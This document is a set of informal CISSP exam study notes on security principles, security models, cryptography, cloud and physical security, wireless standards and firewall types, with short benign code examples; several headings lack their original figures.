~ Secure defaults (e.g. Linux: services disabled by default)
~ Fail securely (e.g. a firewall closes all traffic if it fails)
~ Separation of Duties
~ Keep it simple (e.g. Google SSO to access multiple sites)
~ Zero Trust
~ Privacy by design
~ Trust but verify
~ Shared responsibility

ECONOMY OF MECHANISM (KEEP IT SIMPLE)

A more complex program means more bugs, which lead to more vulnerabilities.

~ Unnecessary functionality or security mechanisms should be avoided
~ Strive for simplicity
~ Strive for ease of operation

PRIVACY BY DESIGN

It is a framework that embeds privacy into the design and operation of IT systems, network infrastructure and business practices.

Principles of Privacy by Design

~ Proactive, not reactive
~ Privacy as the default setting
~ Privacy embedded into design
~ Ensure end-to-end security
~ Maintain visibility and transparency
~ Respect for user privacy (how data is collected)
~ Retain full functionality

ZERO TRUST

It is a security model, a set of system design principles, and a coordinated cybersecurity and system management strategy based on the acknowledgement that threats exist both INSIDE and OUTSIDE network boundaries.

The ultimate objective is to prevent data breaches and limit lateral movement.

Principles of Zero Trust

1. Always verify (authenticate and authorize every access attempt)
2. Use least privilege access (assign minimum rights)
3. Assume breach (assume the worst-case scenario)

UNDERSTAND FUNDAMENTAL CONCEPTS OF


SECURITY MODEL

Enterprise Architecture Blueprint requires


1) Foundation Policy
2) Hardware
3) Operating System
4) Database
5) Network
6) API
7) Hypervisor
8) Application
9) User
10) Data

Enterprise Architecture

Enterprise Security Architecture


1)Implement building blocks of Information Security Infrastructure
2) Focused on setting long term strategy
3) Establish priorities for Security Infrastructure

Common System Components: Processor


1)Fetching Data
2) Decoding Data
3) Executing Data
4) Storing Data

Increasing Performance of Any System

 Multitasking — (Heavy on CPU), 1 CPU, Execute more than 1 task


simultaneously
 Multiprocessing — Multiple CPU, Execute more than 1 process
 Multithreading — (Easy on CPU) Execute different part of program at
same time. Splitting into smaller blocks. MOST EFFICIENT

Firmware (E.g. BIOS)


1)Storage of program in ROM
2) Embedded in hardware to control hardware
3) Non Volatile

UNDERSTAND SECURITY CAPABILITIES OF


INFORMATION SYSTEM.

1. Memory Protection
2. TPM (Trusted Platform Module)
3. Cryptographic Module
4. HSM (Hardware Security Module)

Generic OS / Computer Model


Level 0 — OS Kernel

Level 1 — Other OS components

Level 2 — Device Driver, Communication, Data

Level 3 — User Application

TCB — Provides CONFIDENTIALITY and INTEGRITY

Trusted Computing (e.g. VPN)


It's a framework (concept). No single component can define the overall security.
Security Kernel (Reference Monitor) -> Acts like an interface between the user and the kernel and then grants access to the application
SECURITY KERNEL

1. Monitors and validates access control over system objects
2. The enforcement and validation component of a secure OS
3. To maximize the effectiveness of the security kernel, the user subject must be executed with the least privilege necessary to perform its function
4. The kernel provides services by acting as an interface between programs operating under its control and the physical hardware of the computer, insulating programs running on the system from the complexities of the computer

TRUSTED PLATFORM MODULE (TPM)


ISO / IEC 11889 Certified Service

TPM = Secure Crypto processor

1. Attestation: Creates a cryptographic hash of the system state
2. Binding: Encrypts data using the TPM key
3. Sealing: Ensures ciphertext can be decrypted only when the system is in a specific (trusted) state
RACE CONDITION
Doing the same function at the same time creates a CONFLICT. A race condition is a scenario that occurs in a multithreaded environment when multiple threads share the same resource or execute the same piece of code. If not handled properly, this can lead to an undesirable situation where the output state depends on the order of execution of the threads.

Example 1 — A bedroom with 2 different switches that turn the same light ON and OFF

Example 2 — Two people trying to purchase the same item at the same time online

Example 3 — Consider the operation of adding money to your bank account. Let
us say you are doing so using two different apps simultaneously. The following
steps take place while doing so:

1. The app reads your current balance


2. The additional amount is added to the current balance
3. The bank balance is finally updated

Assume your current balance is ₹1000, and you add ₹200 from app A, and ₹500
from app B

The following race condition occurs:

1. App A reads the current balance, which is ₹1000


2. App A adds ₹200 to ₹1000 and gets ₹1200 as the final balance
3. Meanwhile, app B fetches the current balance, which is still ₹1000, as
app A has not executed step 3
4. App B adds ₹500 to ₹1000 and gets ₹1500 as the final balance
5. App B updates the account balance to ₹1500
6. App A updates the account balance to ₹1200

Thus the final balance is ₹1200 instead of ₹1700


The above 3 steps in the app’s flow belong to its critical section, as the flow allows
multiple threads to access the same resource. In the above case, the bank balance
variable is a shared resource

This is an example of a read-modify-write race condition.

 Race conditions can leave the system vulnerable to security attacks where attackers can tamper with the shared data
 Race conditions can be avoided by proper synchronization between threads. In Java, the synchronized and volatile keywords help achieve this (a minimal sketch of the same idea follows below).
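A minimal Python sketch of the bank-balance example above, assuming a shared `balance` variable: without the lock, the read-modify-write steps from two threads can interleave and lose an update; holding a `threading.Lock` around the critical section makes each deposit atomic.

```python
import threading

balance = 1000
lock = threading.Lock()

def deposit(amount: int) -> None:
    """Read-modify-write on the shared balance; the lock makes it atomic."""
    global balance
    with lock:                     # remove this lock and updates can be lost
        current = balance          # 1. read current balance
        current += amount          # 2. add the deposit
        balance = current          # 3. write the new balance back

t1 = threading.Thread(target=deposit, args=(200,))   # "app A"
t2 = threading.Thread(target=deposit, args=(500,))   # "app B"
t1.start(); t2.start()
t1.join(); t2.join()
print(balance)  # 1700 with the lock; without it, 1200 or 1500 are possible
```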

COVERT CHANNEL (CLOSED)


Communication mechanism hidden from access control and standard monitoring
system of an Information system.

A covert channel uses programs or communications paths in ways that were not
intended. Trojans can use covert channels to communicate

A covert channel is a secret or hidden communication channel used to transmit


information without being detected by an unauthorized party

Covert impacts
1. Confidentiality
2. Integrity

Race condition is Covert Timing

2 Types of Covert Channel

1. Storage channels — Communicate by modifying a “storage location”,


such as a hard drive.
2. Timing channels — Perform operations that affect the “real response
time observed” by the receiver.

Only way to mitigate is Secure Design of Information system

OVERT CHANNEL (OPEN)


An overt channel is a communications path that is not hidden.

An overt channel is the normal and legitimate way that programs communicate
within a computer system or network.

An overt channel, is a public or open communication channel that is easily


accessible and visible to all parties
EMANATION SECURITY (ES)
Preventing unauthorized intercept of EMI or RF signals from the devices.

Emanation security refers to the practice of protecting sensitive information or


assets from unauthorized access or disclosure through various means, such as
encryption, access controls, and physical security measures. It is an important
aspect of data security and privacy, as it helps to prevent sensitive information
from falling into the wrong hands.

Example 1 : In older TV when we keep phone near to it it had noise issue or


screen flickers.

Example 2 : Phone jammers in Military area. (To avoid frequency interception)

TEMPEST (It is a Standard) is used to protect against ES

TEMPEST Countermeasures include

1. Faraday Cage (Metal mesh to limit frequency)


2. White Noise (Fake signal)
3. Control Zones ( Combination of Faraday cage, White noise)

Any question on Side Channel Attack = Emanation Attack

SECURITY MODELS
It defines rules of behavior for an Information System to enforce policies related
to system but typically involving Confidentiality or Integrity policies of the system.

Security Model = Set of rules how SUBJECT talks to OBJECT


A) BELL–LAPADULA (CONFIDENTIALITY) MODEL

(1st model in the DoD, specifically for CONFIDENTIALITY)

Rules

1. No Read Up (Simple Security Property)
2. No Write Down (Star Property)
3. Strong Star Property rule (Read and Write only at own level)
Example: To avoid accidentally copying sensitive data so that it becomes accessible to a lower subject
B) BIBA (INTEGRITY) MODEL

Focuses on Integrity

Rules

1. No Read Down (Simple Integrity Property)
2. No Write Up (Star Integrity Property)
3. A lower-level process cannot request higher access (Invocation Property)
Example: Senior management should not rely on information from a lower-integrity subject.

Do not trust data analysis based on a random Google result; rather, trust a higher-integrity subject based on a valid data source. (A small sketch of both models' rules follows below.)
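A minimal sketch of the read/write rules of both models, assuming numeric levels where a higher number means more sensitive (Bell-LaPadula) or more trustworthy (Biba):

```python
# Levels: higher number = more sensitive (BLP) or more trustworthy (Biba).
def blp_can_read(subject_level: int, object_level: int) -> bool:
    """Bell-LaPadula simple security property: no read up."""
    return subject_level >= object_level

def blp_can_write(subject_level: int, object_level: int) -> bool:
    """Bell-LaPadula star property: no write down."""
    return subject_level <= object_level

def biba_can_read(subject_level: int, object_level: int) -> bool:
    """Biba simple integrity property: no read down."""
    return subject_level <= object_level

def biba_can_write(subject_level: int, object_level: int) -> bool:
    """Biba star integrity property: no write up."""
    return subject_level >= object_level

# A Secret (2) subject and a Top Secret (3) object:
print(blp_can_read(2, 3))   # False: reading up would leak confidential data
print(biba_can_write(2, 3)) # False: writing up could corrupt higher-integrity data
```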
C) CLARK-WILSON INTEGRITY MODEL (Rule Based)

1. 1st commercial model
2. Separation of Duties (split among 2–3 people)
3. Ensures data consistency.
4. Prevents data modification by unauthorized parties.
5. Prevents improper data modification by authorized parties without the consent of all involved.

Quick Point — Remember Clark as a Bank Clerk: 2 people doing the job, SoD. This is an extended version of BIBA using 2–3 people.

D) BREWER NASH MODEL — CHINESE WALL (Role Based)

SDLC Security Mode

1. One process separated from different process.


2. Designed to prevent conflict of interest.
3. Should not access confidential information of a client organization and
one or more of its competitor.

TRUST AND ASSURANCE


A Trusted System is one in which all protection mechanisms work together to process sensitive data for many types of users while maintaining a stable and secure computing environment.

Assurance is simply defined as the degree of confidence in the satisfaction of security needs. It should be continuously maintained, updated and reverified.

CERTIFICATION AND ACCREDITATION


Certification — Technical evaluation / validation of the product

Accreditation — Management's formal acceptance to onboard the product

EVALUATION CRITERIA

1. TCSEC (Orange Book) — Trusted Computer System Evaluation Criteria (limited to the DoD)

~ Confidentiality validation only (no Availability or Integrity)
~ Primarily intended to help the DoD find products that met those basic standards
~ Superseded by CC

2. CC — Common Criteria (ISO/IEC 15408)

~ 1st truly international product evaluation criteria
~ CC introduced Protection Profiles (PP)
Protection Profile (PP) — Baseline of security requirements

Target of Evaluation (TOE) — The product proposed for testing

Security Target (ST) — Document explaining the security features

STANDARD EAL PACKAGE LEVELS (EAL = EVALUATION ASSURANCE LEVEL)
Remember the levels using the sentence below — check the 1st word of each level

For Sure My Mother So Sweet Forever

Example — "Mother" corresponds to EAL4: Methodically designed, tested and reviewed

CLOUD COMPUTING
Cloud = Remote Network

Computing = CPU, RAM, Storage, App ie All Infrastructure


Data Security and Compliance — — —> Customer Responsibility

Physical Security — — — — — — — — —> Cloud Provider


Responsibility

5 ESSENTIAL CHARACTERISTIC OF CLOUD


COMPUTING

1. On-demand self-service (provision as and when required, no delay)
2. Broad network access (e.g. GoToMeeting, join from anywhere)
3. Resource pooling (shared by multiple customers)
4. Rapid elasticity (scale up and scale down)
5. Measured service (utilization is metered, e.g. for billing)
A) IAAS (INFRASTRUCTURE AS A SERVICE)
1) Customer can install the OS of its choice
2) Customer can install applications of its choice
3) Customer can provision resources (storage, network, software, applications)
4) Total control over applications, middleware and guest OS
5) No control over the underlying cloud hardware

High operational cost

B) PAAS (PLATFORM AS A SERVICE)


1) Customer deploy own application
2) Customer no control on underlying cloud architecture
3) Customer has control on application deployed

Development companies use PAAS to develop application

C) SAAS (SOFTWARE AS A SERVICE)

1) Customer does not manage the cloud infrastructure
2) The provider supplies the application running in the cloud; the customer simply uses it

Low operational cost

D) FAAS (FUNCTION AS A SERVICE)
FaaS is a cloud computing model that allows developers to execute individual functions or pieces of code in a
serverless environment.
Serverless Computing: FaaS eliminates the need for developers to manage server infrastructure. It
abstracts away the server-level details, such as provisioning, scaling, and maintenance, allowing developers to
focus solely on writing and deploying code.

Event-Driven: FaaS is event-driven, meaning functions are triggered by specific events or requests.
These events can include HTTP requests, database changes, file uploads, or custom events, allowing for a highly
responsive and scalable system.

Pay-as-You-Go Pricing: With FaaS, you only pay for the actual compute resources used during the
execution of functions. There are no upfront costs or idle resources, making it cost-efficient and scalable for a
wide range of applications.

Rapid Scaling: FaaS platforms automatically scale functions in response to increased workloads. This
elasticity ensures that your application can handle varying levels of traffic without manual intervention,
improving reliability and performance.

Microservices and Decoupling: FaaS is well-suited for building microservices-based


applications, as it encourages the decomposition of complex applications into smaller, single-purpose functions.
This decoupling simplifies development, testing, and maintenance while promoting modular and reusable code.
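As a concrete illustration of the event-driven model described above, here is a minimal AWS Lambda-style Python handler; the event fields are hypothetical, and other FaaS platforms use similar but not identical signatures:

```python
import json

def lambda_handler(event, context):
    """Triggered per event (e.g. an HTTP request); no server to provision or manage."""
    name = event.get("name", "world")           # hypothetical field in the incoming event
    body = {"message": f"Hello, {name}!"}
    return {
        "statusCode": 200,                      # HTTP-style response for an API trigger
        "headers": {"Content-Type": "application/json"},
        "body": json.dumps(body),
    }

# Local smoke test; in production the platform invokes the handler and scales it
# automatically with the event rate, billing only for execution time.
print(lambda_handler({"name": "CISSP"}, None))
```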

CLOUD DEPLOYMENT MODELS


A) PRIVATE CLOUD (More Control, High Cost)

1) For only one company
2) May be managed by the company or a 3rd party
B) PUBLIC CLOUD (Less Control, Less Cost)

1) For the general public
2) Available to large industry
3) Example: AWS EC2

C) COMMUNITY CLOUD (Shared Cost)

1) Shared by multiple companies
2) May be on-prem or off-prem
3) May be managed by the companies or a 3rd party
4) Many companies come together and share infrastructure
5) Example: Adani group of companies sharing cloud infrastructure
D) HYBRID CLOUD

1) Mix of Private, Public and Community
2) Used during peak periods for extra compute for a specific period
3) Example: BCP/DR (main site on Private and DR on Public, i.e. AWS/Azure)
SUMMARY
CASB (CLOUD ACCESS SECURITY BROKER)

An interface to monitor cloud security

1) Helps the organization extend on-prem controls to the cloud provider
2) Discovers unauthorized attempts to access private data
3) Offers a single platform for extending or enhancing your security posture
4) Provides visibility into what is happening in the cloud
5) Example: MS Defender, Qualys Guard

PHYSICAL SECURITY / FACILITY DESIGN

Security Survey

1) To identify gaps
2) What we have and what we need

Physical Security is a combination of "PEOPLE, PROCESS, PROCEDURE and TECHNOLOGY"

~ Identify Risk
~ Acceptable Risk Level
~ Baseline Performance
~ Implement Countermeasure
CPTED (CRIME PREVENTION THROUGH ENVIRONMENT DESIGN)

Proper design of Physical environment can reduce CRIME

Example 1: Family Man example where Manoj Bajpai slaps his Boss in closed
cabin, hence sometime cabins can become a Threat.

Example 2: Person can see through glass from inside (Boss) but reverse is not
possible, its rather a mirror from outside.

INTERNAL SECURITY CONTROLS

1. Control of Human Safety — Visible and Audible alarms, fire suppressions


2. Control of Manage Access — Door locker, MFA
3. Internal Monitoring — CCTV, RF monitoring
PERIMETER SECURITY CONTROLS
PHYSICAL PROTECTION

1. Turnstile -> Single person, rotating door (metro/train station access)
2. Mantrap -> Single person, one person at a time (datacenters in Europe)
3. Tailgating -> No consent (gains access secretly behind someone who is typically on their phone and not aware)
4. Piggybacking -> Consent (someone asks to be let in)

UTILITIES

POWER :

1. Redundant power inputs from utilities


2. Redundant power delivery (Different provider)
3. Backup generators
4. Battery backup
5. Dual power Infra within DC
6. Backup source must be tested / exercised
7. Backup source must be sized appropriately and upgraded when the load increases.
FIRE SUPPRESSION:
FIRE STAGES

Best solution for fire is at stage 2 and use of Ionization Detectors

WATER BASED FIRE SUPPRESSION


GAS SYSTEMS (Operate to STARVE the fire for Oxygen)
1. AERO K : Safest for Human
2. FM-200

HALON is very dangerous

DATACENTER TYPES (TIER = LEVEL OF REDUNDANCY)

Uptime Institute Data Center Design — Standard

IDCA (International Data Center Authority) — OPEN standard

The NFPA (National Fire Protection Association) recommends that an IT facility should withstand exposure to fire for up to 60 minutes.
In a datacenter we need POSITIVE PRESSURIZATION.

HVAC (HEAT VENTILATION AIR CONDITIONING)

1. Cooling should be designed


2. Adequate cooling and airflow
3. Airflow should be filtered for contaminates
4. Less humidity to avoid Corrosion
5. Types of Cooling

Latent Cooling — Remove Moisture

Sensible Cooling — Remove Heat


Temp : 60 –70 deg Fahrenheit i.e. 15 to 23 deg Centigrade and
Humidity: 50%

Power Spike -> Temporary period of HV (High Voltage)

Power Surge -> Long period of HV

Power Fault -> Temporary LOSS of power

Power Blackout -> Complete (prolonged) LOSS of power

Power Brownout -> Long period of LV (Low Voltage)

Power Dip / Sag -> Temporary period of LV

— — — — END OF PHYSICAL SECURITY — — — — —

EMBEDDED SYSTEM

1. IoT (Internet of Things)
2. ICS (Industrial Control Systems), for example SCADA, PLC and DCS

Protocol used : Modbus and DNP3

A) ICS ( Industrial Control Systems)

1. Dedicated computing platform


2. Limited Processing power
3. Limited functions
4. Specialized OS
5. Long service life in many application
6. Biggest concern = Availability
7. System/ Network should be separate from General office networks
B) IoT (Internet of Things)
MOBILE SYSTEMS MITIGATION

Concern = Data Security

1. Encryption ( Most effective solution)


2. Bluetooth capability lockdown
3. Prevent Jailbreak or Rooting
4. Remote policies should be pushed
5. Implement device lockdown
6. Endpoint security should extend to mobile end points
7. Use MDM (Mobile Device Mgmt.) / MFA (Multi-Factor Authentication)

Host Protection Software

1. Antivirus
2. Host based IPS / IDS
3. Host Firewall
4. File Integrity Monitoring
5. Config and Policy monitor

CRYPTOGRAPHY
ENCODE — Replace the characters, e.g. A -> 8 & B -> 9

ENCRYPTION — Transform plaintext into ciphertext using an algorithm and a secret key

Crypto has 2 parts: 1) Algorithm (logic) and 2) Key (factor)

Example:

1)Algorithm = Functionality of Lock


2) Key = Its mechanism

CRYPTOGRAPHIC GOALS

1)Confidentiality
2) Integrity
3) Authenticity
4) Non Repudiation

Cryptography was originally used for SECRECY but is now used to:

1) Prevent unauthorized disclosure
2) Detect tampering
3) Prevent repudiation

A) SYMMETRIC CRYPTOGRAPHY (CONFIDENTIALITY)


B) ASYMMETRIC CRYPTOGRAPHY

NEVER USE FOR BULK ENCRYPTION


ONLY USE FOR KEY ENCRYPTION
C) HYBRID CRYPTOGRAPHY (ONLY CONFIDENTIALITY IS ACHIEVED HERE) — a short sketch follows below
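A minimal sketch of the hybrid pattern using the third-party Python `cryptography` package (assumed installed): the bulk data is encrypted with a symmetric key, and only that small key is wrapped with the receiver's RSA public key.

```python
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa

# Receiver's asymmetric key pair (the private key stays with the receiver).
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

# Sender: encrypt bulk data with a fresh symmetric key, then wrap that key with RSA.
sym_key = Fernet.generate_key()
ciphertext = Fernet(sym_key).encrypt(b"large amount of bulk data ...")
oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
wrapped_key = public_key.encrypt(sym_key, oaep)

# Receiver: unwrap the symmetric key with the RSA private key, then decrypt the bulk data.
recovered_key = private_key.decrypt(wrapped_key, oaep)
plaintext = Fernet(recovered_key).decrypt(ciphertext)
print(plaintext)
```

This is why the note says asymmetric algorithms are never used for bulk encryption, only for key encryption; and since nothing here authenticates the sender, only confidentiality is achieved.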

DIGITAL SIGNATURE
S/MIME Process (Secure/Multipurpose internet Mail Extensions)
Strength of Encryption Key

1)Algorithm
2) Secrecy of Key
3) Length of Key

CRYPTOGRAPHY: Science of hiding information

CRYPTANALYSIS: Science of studying and breaking secrecy

CRYPTOSYSTEM: Mechanism that carries out cryptography

WORK FACTOR: Amount of time and resources needed to break a cryptosystem

ALGORITHM: Procedure to encrypt plaintext into ciphertext

KEY: Used in conjunction with the algorithm to encrypt/decrypt

KEYSPACE: Range of key values that can be used with the algorithm

EXAM Qs:

1) What is a Vernam cipher?
2) Which cryptography is impossible to crack?
3) Which should be used for highly sensitive data?

Answer: OTP (One-Time Pad)

INITIALIZATION VECTOR (IV)

It randomizes values so that identical plaintexts do not produce identical ciphertexts.

Example: Home Wi-Fi derives separate per-session values for every member connecting with the same password.

DATA ENCRYPTION STANDARD (DES)


AES ( ADVANCED ENCRYPTION STANDARD)
ASYMMETRIC ALGORITHM
1)RSA
2) DH
3) ELGAMAL
4) ECC (Elliptic Curve Cryptography)

The above illustration highlights how asymmetric cryptography works.

Different Security Goals

1. Authenticity (Open Message Format) — Encrypt with the SENDER'S Private Key (NO CONFIDENTIALITY)
2. Confidentiality (Secure Message Format) — Encrypt with the RECEIVER'S Public Key (CONFIDENTIALITY)
3. Authentication and Confidentiality (Secure and Signed Format) — Do both: sign with the sender's private key and encrypt with the receiver's public key

A) RSA (Rivest Shamir Adleman) — (Based on Factorization)

The RSA algorithm is an asymmetric cryptography algorithm; this means that it


uses a public key and a private key (i.e two different, mathematically linked keys).
As their names suggest, a public key is shared publicly, while a private key is
secret and must not be shared with anyone.
B) ECC (Elliptic-Curve Cryptography) — (Based on the Discrete Logarithm problem)

ECC is another type of asymmetric mathematics that is used for cryptography.


Unlike RSA, which uses an easily understood mathematical operation — factoring
a product of two large primes — ECC uses more difficult mathematical concepts
based on elliptic curves over a finite field. The ECC cryptography is considered
a natural modern successor of the RSA cryptosystem, because ECC
uses smaller keys and signatures than RSA for the same level of security and
provides very fast key generation, fast key agreement and fast signatures.
C) DH (Diffie-Hellman) — (Based on the Discrete Logarithm problem)

Based on public key cryptography, the D-H algorithm is a method for securely exchanging a shared key between two parties over an untrusted network. It is an asymmetric key-agreement algorithm used by several protocols including SSL/TLS, SSH, and IPsec.
D) ELGAMAL — (Based on the Discrete Logarithm problem)

El Gamal algorithm is used in encryption and decryption, which is mainly


considered for its capability to make the key predictions extremely tough. The
asymmetric algorithm uses the mechanism of private and the public key, making
the key predictions even tougher
E) MAC (Message Auth Code)

A Message Authentication Code (MAC) is a cryptographic technique that verifies


the integrity and authenticity of a message. It involves a secret key to generate a
fixed-size code (tag) from the message. Recipients can use the same key to
recompute the tag and compare it to the received one, ensuring data integrity and
origin authenticity.
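A minimal sketch of a MAC using Python's standard hmac module (the shared key and message are placeholders):

```python
import hashlib
import hmac

shared_key = b"shared-secret-key"                 # known only to sender and receiver
message = b"Pay vendor 42 the sum of $700"

# Sender computes the tag and transmits message + tag.
tag = hmac.new(shared_key, message, hashlib.sha256).hexdigest()

# Receiver recomputes the tag with the same key and compares in constant time.
expected = hmac.new(shared_key, message, hashlib.sha256).hexdigest()
if hmac.compare_digest(tag, expected):
    print("Message is authentic and unmodified")
else:
    print("Integrity/authenticity check failed")
```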
F) QC (Quantum Cryptography)

Quantum cryptography is a secure communication method that uses the


principles of quantum mechanics. It leverages quantum properties like
superposition and entanglement to create unbreakable encryption keys. Any
attempt to intercept the quantum-entangled keys would alter their state, alerting
users to potential eavesdropping, ensuring highly secure data transmission.
KEY MANAGEMENT PRACTICES

Key management is a crucial practice in cryptography and security. It involves


generating, storing, distributing, and safeguarding cryptographic keys used for
encryption, decryption, and authentication. Key management practices include:

1. Key Generation: Creating strong, random keys.


2. Key Storage: Safely storing keys to prevent unauthorized access.
3. Key Distribution: Securely sharing keys among authorized parties.
4. Key Rotation: Periodically changing keys to limit exposure.
5. Key Revocation: Deactivating compromised or unused keys.
6. Key Backup: Storing copies of keys for recovery.
7. Access Control: Restricting key access to authorized users.
8. Audit and Monitoring: Regularly reviewing key usage and changes.
9. Cryptographic Algorithms: Selecting strong encryption methods.
10. Hardware Security Modules (HSMs): Using specialized devices for key
protection.

Effective key management ensures data confidentiality and integrity in secure


communication and storage systems.
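As a small illustration of practice 1 (key generation), assuming Python's standard library: keys must come from a cryptographically secure random source, never from predictable values such as timestamps or counters.

# Key generation should always use a cryptographically secure random source.
import secrets

aes_256_key = secrets.token_bytes(32)   # 256 bits of CSPRNG output
print(len(aes_256_key) * 8, "bit key")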
SUMMARY
PKI (PUBLIC KEY INFRASTRUCTURE)
Public Key Infrastructure (PKI) is a framework of hardware, software,
policies, and standards used to manage digital keys and certificates, facilitating
secure communication and authentication in a networked environment. Here’s an
overview of PKI:

1. Digital Certificates: PKI relies on digital certificates, which bind a


user’s or entity’s identity to their public key. Certificates are issued by
trusted entities called Certificate Authorities (CAs).
2. Certificate Authority (CA): CAs are responsible for verifying the
identity of certificate requesters and issuing digital certificates. Trusted
CAs are essential for a PKI’s security.
3. Public and Private Keys: PKI uses asymmetric encryption, where
each user/entity has a pair of public and private keys. The public key is
shared, while the private key is kept secret.
4. Key Pair Generation: Users generate their key pairs and obtain digital
certificates from CAs. The CA verifies the user’s identity before issuing a
certificate.
5. Certificate Revocation: CAs maintain Certificate Revocation Lists
(CRLs) to track and revoke compromised or no longer valid certificates.
6. Key Recovery: Some PKIs include mechanisms for key recovery in case
users lose their private keys.
7. Secure Communication: PKI is used to secure communication by
encrypting data with the recipient’s public key and decrypting it with
their private key.
8. Authentication: PKI enables strong authentication by verifying the
digital certificate of the communicating parties, ensuring their identities.
9. Digital Signatures: Digital signatures are used for data integrity and
authentication. A sender signs data with their private key, and the
recipient verifies it using the sender's public key (a minimal sketch follows this list).
10. Secure Email, SSL/TLS, VPNs: PKI is widely used in secure email,
web browsing (SSL/TLS), and virtual private networks (VPNs).
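A minimal sketch of the signing flow from point 9, assuming Python's cryptography package and an Ed25519 key pair (the specific algorithm here is just an example): the sender signs with the private key, and anyone holding the public key can verify integrity and origin.

# Illustrative digital signature: sign with the private key, verify with the public key.
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.exceptions import InvalidSignature

private_key = Ed25519PrivateKey.generate()
public_key = private_key.public_key()

document = b"quarterly report v1.0"
signature = private_key.sign(document)

try:
    public_key.verify(signature, document)          # raises if tampered or wrong signer
    print("signature valid - integrity and origin confirmed")
except InvalidSignature:
    print("signature invalid - document altered or wrong signer")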
CRYPTOGRAPHIC PROCESS
ATTACK ON CRYPTOSYSTEM
EXAM POINTS (IMPORTANT AND BRIEF)
CISSP: Domain 4 — Communications and
Network Security : Easy Notes to Pass CISSP
Certification in 2023–24
[Link]

DOMAIN OBJECTIVES
OSI AND TCP/IP
FIREWALL ARCHITECTURE
WIRELESS
BLUETOOTH
UNDERSTANDING OF PROTOCOLS
VPN TYPES
RADIUS AND TACACS
ATTACKS

OSI MODEL
Easy way to remember 7 layers using below sentence

All People Seem To Need Data Processing (Application down to Physical)

OSI vs TCP/IP Layer


1. Physical Layer
2. Data Link Layer
3. Network Layer
4. Transport Layer
5. Session Layer
6. Presentation Layer
7. Application Layer
NETWORK DEPLOYMENT AND PROTOCOLS

NETWORK ZONES

Trusted — Windows, Linux, Database Servers, SIEM

DMZ — Web Server, IPS/IDS, DNS, Email, VPN

Untrusted — Web Server, SIEM, IPS/IDS


FIREWALL ARCHITECTURE

DUAL-HOMED HOST (MULTIHOMED)


SCREENED HOST
SCREENED SUBNET
CONVERGENCE AND IP CONVERGENCE

1. A converged IP network is a single platform on which interoperable devices


can run in innovative ways.
2. Excellent support for multimedia applications; "converged" implies that
two previously separate protocols now run as one.
3. A common network protocol is used to carry protocols it does not natively support.
FCoE (FIBRE CHANNEL OVER ETHERNET)
iSCSI (INTERNET SMALL COMPUTER SYSTEM INTERFACE)
MPLS (MULTIPROTOCOL LABEL SWITCHING)
VoIP (VOICE over IP)

WIFI (WIRELESS LAN)


WiFi operates on radio waves, typically using the 2.4 GHz and 5 GHz frequency
bands, to transmit data between devices and access points (routers). These radio
waves are modulated to carry digital information, allowing for the wireless
transfer of data packets.

One of the primary advantages of WiFi is its versatility and widespread use. It has
become an integral part of homes, businesses, public spaces, and even
transportation systems. WiFi enables seamless internet access, file sharing, and
communication across a multitude of devices, making it an essential technology in
our connected world.
WIRELESS SECURITY STANDARDS

WEP (WIRED EQUIVALENT PRIVACY)

WEP (Wired Equivalent Privacy) is the oldest and most common Wi-Fi security
protocol. It was the privacy component established in the IEEE 802.11, a set of
technical standards that aimed to provide a wireless local area network (WLAN)
with a comparable level of security to a wired local area network (LAN).

▪ WEP Uses the Stream cipher RC4 for Confidentiality and CRC-32 Checksum for
Integrity.

▪ Key & IV length are small, hence vulnerable to brute-force attacks.

▪ Biggest concern: Privacy


WPA (WiFi Protected Access)

WPA (Wi-Fi Protected Access) is a security protocol used to secure Wi-Fi


networks. It protects against unauthorized access to your network by encrypting
data transmitted over the network.

No need to change hardware

WPA2 (Used in Enterprise)

WPA2 is a security protocol used for Wi-Fi networks. It provides encryption for
data transmitted over the network, protecting users from unauthorized access and
tampering. WPA2 is the most commonly used security protocol for Wi-Fi
networks and is considered to be highly secure when properly configured.
Requires a hardware upgrade

WPA3

WPA3 is the latest security standard for Wi-Fi networks, designed to provide
enhanced security and privacy for users. It replaces WPA2 and includes new
features such as the Simultaneous Authentication of Equals (SAE) handshake,
which resists offline dictionary attacks, along with forward secrecy and improved
protection for open networks. With WPA3, your Wi-Fi connection
will be more secure and protected against unauthorized access.
LiFi (LIGHT FIDELITY)

Li-Fi, short for “light fidelity,” is a wireless communication technology that uses
visible light from LED bulbs to transmit data. It is an alternative to traditional Wi-
Fi and has the potential to offer faster and more secure internet connectivity. Li-Fi
operates by modulating the intensity of light to carry binary data, allowing devices
equipped with Li-Fi receivers to connect to the internet. This technology is still in
the early stages of development and is being explored for various applications,
such as indoor positioning and high-speed internet in areas where Wi-Fi is
limited. However, it is important to note that Li-Fi requires a direct line of sight,
which may limit its usability in certain scenarios.


ZIGBEE

Used for IOT

IEEE 802.15.4 standard


Zigbee is a wireless communication technology that is commonly used for low-
power, low-cost wireless sensor and control networks. It is designed for short-
range, low-data rate applications. Zigbee networks can be used in various
industries, including home automation, smart energy management, and industrial
control systems. Some popular Zigbee devices include smart light bulbs,
thermostats, and security sensors.

SECURING NETWORK COMPONENTS

FIREWALLS

1st Generation — — — -> Packet Filters

2nd Generation — — —> Proxies (Application level and Circuit Level Proxy)

3rd Generation — — — — — — — -> Stateful


1st GENERATION STATIC PACKET FILTERING (STATELESS)
2nd GENERATION FIREWALL
3rd GENERATION FIREWALL (STATEFUL)

4th GENERATION FIREWALL (NEXT GEN)

Works from layer 3 to Layer 7
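To make the contrast with the later generations concrete, here is a hypothetical sketch of what a 1st-generation static (stateless) packet filter does: every packet is judged against a fixed rule list using header fields only, with no memory of earlier packets (the rules and addresses below are invented for illustration).

# Hypothetical stateless packet filter: each packet is checked against static rules.
RULES = [
    # (source, destination, dest_port, action)
    ("any", "10.0.0.5", 443, "allow"),   # allow HTTPS to the web server
    ("any", "any",      23,  "deny"),    # block Telnet everywhere
]

def filter_packet(src, dst, dport):
    for rule_src, rule_dst, rule_port, action in RULES:
        if (rule_src in ("any", src) and rule_dst in ("any", dst)
                and rule_port == dport):
            return action
    return "deny"                         # default deny; no connection state is kept

print(filter_packet("203.0.113.7", "10.0.0.5", 443))   # allow
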